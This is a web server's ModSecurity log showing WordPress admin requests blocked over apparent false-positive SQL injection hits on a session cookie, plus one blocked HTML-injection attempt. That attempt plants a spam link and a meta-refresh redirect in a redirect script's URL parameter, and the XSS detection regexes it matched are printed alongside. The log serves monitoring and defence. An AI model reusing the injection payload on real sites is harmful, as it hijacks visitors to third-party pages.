[Mon May 11 22:32:06.634092 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8xqFW67LJTsgN3jQN4gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:06.634380 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8xqFW67LJTsgN3jQN4gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:07.294172 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8xqFW67LJTsgN3jQN4gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:08.243169 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8yKFW67LJTsgN3jQN4wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:08.243453 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8yKFW67LJTsgN3jQN4wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:08.829339 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8yKFW67LJTsgN3jQN4wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:11.052964 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8y6FW67LJTsgN3jQN5gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:11.053331 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8y6FW67LJTsgN3jQN5gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:11.595765 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8y6FW67LJTsgN3jQN5gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:13.346018 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8zaFW67LJTsgN3jQN6QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:13.346323 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8zaFW67LJTsgN3jQN6QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:13.895933 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8zaFW67LJTsgN3jQN6QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:14.135474 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8zqFW67LJTsgN3jQN6gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:14.135770 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8zqFW67LJTsgN3jQN6gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:14.502883 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8zqFW67LJTsgN3jQN6gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:16.640747 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI80KFW67LJTsgN3jQN7QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:16.641055 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI80KFW67LJTsgN3jQN7QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:17.258418 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI80KFW67LJTsgN3jQN7QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:18.038367 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI80qFW67LJTsgN3jQN7wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:18.038666 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI80qFW67LJTsgN3jQN7wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:18.269977 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>high-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.270405 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>H..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.270609 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.270725 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OW [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.270906 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.271353 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.271659 2026] [security2:error] [pid 1590352:tid 1590400] [client 27.78.84.116:62808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI80q1q0G_aXAqWauT82wAAAIg"]
[Mon May 11 22:32:18.630637 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI80qFW67LJTsgN3jQN7wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:19.434981 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI806FW67LJTsgN3jQN8QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:19.435321 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI806FW67LJTsgN3jQN8QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:20.044418 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI806FW67LJTsgN3jQN8QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:21.241545 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI81aFW67LJTsgN3jQN8wAAABU"], referer: https://rentparadise.fr/wp-login.php
